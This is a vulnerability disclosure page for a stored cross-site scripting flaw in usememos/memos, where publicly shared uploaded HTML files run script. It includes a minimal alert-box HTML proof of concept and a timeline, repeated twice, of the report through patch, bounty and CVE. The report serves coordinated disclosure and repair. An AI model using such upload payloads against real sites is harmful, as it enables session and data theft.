Cross-site scripting in usememos/memos

Valid

Reported on

Nov 23rd 2022

Description

memos allow users to upload file and make it public to others. But if the file is html with below content, xss attack can happen.

Proof of Concept

// PoC.js
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<script>
    alert("warning");
</script>
</head>
<body>


</body>
</html>

Impact

This vulnerability may allow an attacker to perform cross-site scripting (XSS) attacks to gain access potentially sensitive information.

References

poc result

We are processing your report and will contact the usememos/memos team within 24 hours. 2 months ago

lujiefsi

commented 2 months ago

Researcher

beleive that the demo site "https://demo.usememos.com/" is under threat.

We created a GitHub Issue asking the maintainers to create a SECURITY.md 2 months ago

We have contacted a member of the usememos/memos team and are waiting to hear back 2 months ago

We have sent a follow up to the usememos/memos team. We will try again in 7 days. a month ago

We have sent a second follow up to the usememos/memos team. We will try again in 10 days. a month ago

We have sent a third and final follow up to the usememos/memos team. This report is now considered stale. 25 days ago

A usememos/memos maintainer

commented 25 days ago

Maintainer

Great work @lujiefsi 👌 Could you kindly propose/submit a fix for this vulnerability? Any help is appreciated.

lujiefsi submitted a

patch

24 days ago

lujiefsi

commented 24 days ago

Researcher

also see https://github.com/usememos/memos/pull/749

lujiefsi

commented 21 days ago

Researcher

it seems that we the patch has been merged. @maintainer could you verify this report?

A usememos/memos maintainer validated this vulnerability 21 days ago

lujiefsi has been awarded the disclosure bounty

The fix bounty is now up for grabs

The researcher's credibility has increased: +7

A usememos/memos maintainer marked this as fixed in 0.9.0 with commit 726285 21 days ago

lujiefsi has been awarded the fix bounty

This vulnerability has been assigned a CVE

A usememos/memos maintainer published this vulnerability 21 days ago

to join this conversation

We are processing your report and will contact the usememos/memos team within 24 hours. 2 months ago

lujiefsi

commented 2 months ago

Researcher

beleive that the demo site "https://demo.usememos.com/" is under threat.

We created a GitHub Issue asking the maintainers to create a SECURITY.md 2 months ago

We have contacted a member of the usememos/memos team and are waiting to hear back 2 months ago

We have sent a follow up to the usememos/memos team. We will try again in 7 days. a month ago

We have sent a second follow up to the usememos/memos team. We will try again in 10 days. a month ago

We have sent a third and final follow up to the usememos/memos team. This report is now considered stale. 25 days ago

A usememos/memos maintainer

commented 25 days ago

Maintainer

Great work @lujiefsi 👌 Could you kindly propose/submit a fix for this vulnerability? Any help is appreciated.

lujiefsi submitted a

patch

24 days ago

lujiefsi

commented 24 days ago

Researcher

also see https://github.com/usememos/memos/pull/749

lujiefsi

commented 21 days ago

Researcher

it seems that we the patch has been merged. @maintainer could you verify this report?

A usememos/memos maintainer validated this vulnerability 21 days ago

lujiefsi has been awarded the disclosure bounty

The fix bounty is now up for grabs

The researcher's credibility has increased: +7

A usememos/memos maintainer marked this as fixed in 0.9.0 with commit 726285 21 days ago

lujiefsi has been awarded the fix bounty

This vulnerability has been assigned a CVE

A usememos/memos maintainer published this vulnerability 21 days ago

to join this conversation